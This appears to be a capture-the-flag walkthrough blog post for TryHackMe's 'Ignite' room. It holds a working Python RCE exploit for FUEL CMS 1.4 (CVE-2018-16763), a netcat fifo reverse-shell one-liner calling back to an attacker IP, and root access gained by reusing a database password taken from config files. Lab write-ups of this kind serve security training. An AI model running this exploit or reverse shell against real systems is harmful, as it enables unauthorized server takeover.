PenLog - Ignite by TryHackMe

James Fraser · September 28, 2020

Details

Platform: TryHackMe
Difficulty: Easy
Link: Ignite

Enumeration

Run nmap default port scan on target with TCP connect/version/script options:

$ nmap -vv -Pn -sT -sV -sC 10.10.211.150

This results in:

nmap1 (Note: http-title “Welcome to FUEL CMS”.)

Google “FUEL CMS” and note description on website:

“The content management system for premium-grade websites.”

Open browser an navigate to target’s open http port 80; note FUEL CMS version v1.4:

fuelcms

Also note mention of default credentials:

fuelcms-creds (Note: Logging in to the portal proved useless.)

Taking a chance on this, use searchsploit and evaluate results:

$ searchsploit fuelcms 1.4
...

searchsploit (Note: “ss” in the above is a bash alias for searchsploit.)

Download the PoC with EDB ID 47138:

$ searchsploit -m 47138
$ dos2unix 47138

47138 Description

47138 demonstrates a PHP code execution vulnerability where un-trusted input results in Remote Code Execution (RCE). Looking at the code, the vulnerable parameter is highlighted by the burp0_url variable:

burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"

The URL encoded data can be decoded like so:

$ python -c 'import urllib;print(urllib.unquote("%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27\"+urllib.quote(xxxx)+\"%27%29%2b%2"))'

urldecode-filter

As shown in the decoded PHP code, a call to PHP’s system results in code execution.

User Shell

I re-wrote the 47138 PoC (fuelpwn.py) and stripped out printing of the GET request response and built-in support for the Burp Suite proxy:

"""
FUEL CMS v1.4.1 CVE-2018-16763 PoC.

This PoC was derived from: https://www.exploit-db.com/exploits/47138.
"""
import argparse
import urllib
import requests

parser = argparse.ArgumentParser('Fuel CMS v1.4 CVE-2018-16763 PoC')

parser.add_argument('url', type=str, help='URL to target, e.g. http://127.0.0.1')
parser.add_argument('cmd', type=str, help='Command to execute')
args = parser.parse_args()

url=args.url
cmd=args.cmd

payload="'+pi(print($a='system'))+$a('"+cmd+"')+'"
payload_enc=urllib.quote(payload)  # URL encoded payload
filter_path='/fuel/pages/select/?filter='+payload_enc

try:
    _ = requests.get(url+filter_path)
except:
    pass

(Note: You can download my port here.)

This port simplifies getting a reverse shell.

Start a nc reverse listener on port 4444:

$ nc -vnlp 4444

Run fuelpwn.py supplying target URL and command to execute connecting back to the attacking machine - use fifo since nc on target does not have support for -e (see man nc):

$ python fuelpwn.py http://10.10.211.150 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.4.9.232 4444 >/tmp/f"

user-shell (Note: “reverse” in the above is a bash alias for nc -vnlp 4444.)

Upgrade the shell with a PTY:

$ python -c 'import pty; pty.spawn("/bin/bash")'
$ (Ctrl-Z)
$ stty raw -echo
$ fg
$ export TERM=xterm && reset

Get the user flag.txt:

user-flag

Root Shell

Track down the FUEL CMS config directory and use grep to find database password:

dbpassword

Perform the same to find username:

dbusername

Notice the username is root; test for password re-use against root user and get root.txt:

root-shell (Note: supplied password was mememe.)

Twitter, Facebook